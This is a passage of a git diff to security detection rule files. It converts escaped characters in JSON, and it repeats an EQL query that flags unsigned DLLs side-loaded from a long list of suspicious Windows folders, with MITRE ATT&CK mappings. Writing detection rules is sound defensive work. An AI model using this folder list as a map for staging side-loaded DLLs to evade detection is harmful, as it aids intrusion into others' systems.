\"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", "related_integrations": [ { "package": "endpoint", 
@@ -68,7 +68,7 @@
 ],
 "risk_score": 47,
 "rule_id": "ca98c7cf-a56e-4057-a4e8-39603f7f0389",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_5.json b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_5.json
index d9d2a897273..4766d9fac3c 100644
--- a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_5.json
@@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Unsigned DLL Side-Loading from a Suspicious Folder", "note": "", - "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time \u003c= 500 or dll.Ext.relative_file_name_modify_time \u003c= 500) and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n 
\"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n \"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", + "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time <= 500 or dll.Ext.relative_file_name_modify_time <= 500) and \n \n not dll.code_signature.status : (\"trusted\", 
\"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n \"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n 
\"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", "related_integrations": [ { "package": "endpoint", 
@@ -68,7 +68,7 @@
 ],
 "risk_score": 47,
 "rule_id": "ca98c7cf-a56e-4057-a4e8-39603f7f0389",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_6.json b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_6.json
index 51973a6fb2d..f1f7bf93565 100644
--- a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_6.json
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unsigned DLL Side-Loading from a Suspicious Folder", - "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time \u003c= 500 or dll.Ext.relative_file_name_modify_time \u003c= 500) and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n 
\"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n \"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", + "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time <= 500 or dll.Ext.relative_file_name_modify_time <= 500) and \n \n not dll.code_signature.status : (\"trusted\", 
\"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n \"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n 
\"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", "related_integrations": [ { "package": "endpoint", 
@@ -67,7 +67,7 @@
 ],
 "risk_score": 47,
 "rule_id": "ca98c7cf-a56e-4057-a4e8-39603f7f0389",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_105.json b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_105.json
index c63b39e7c4e..d1276cbc026 100644
--- a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_105.json
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_106.json b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_106.json
index 7d9a1063b3f..275567f5bb5 100644
--- a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_106.json
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_107.json b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_107.json
index 63c3a032356..1129e227ac7 100644
--- a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_107.json
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_207.json b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_207.json
index 039e5d7fbb4..05102645944 100644
--- a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_207.json
+++ b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_207.json
@@ -85,7 +85,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_208.json b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_208.json
index d6142151597..e578cbcfa40 100644
--- a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_208.json
+++ b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_208.json
@@ -90,7 +90,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_209.json b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_209.json
index 9f66ede666d..e16b31b6639 100644
--- a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_209.json
+++ b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_209.json
@@ -89,7 +89,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_210.json b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_210.json
index f9bf102a32e..af783f12774 100644
--- a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_210.json
+++ b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_210.json
@@ -91,7 +91,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_211.json b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_211.json
index 37c864052aa..febbd1e9fcb 100644
--- a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_211.json
+++ b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_211.json
@@ -91,7 +91,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/cad4500a-abd7-4ef3-b5d3-95524de7cfe1_206.json b/packages/security_detection_engine/kibana/security_rule/cad4500a-abd7-4ef3-b5d3-95524de7cfe1_206.json
index e8f89ffe7cc..f4b05812cf4 100644
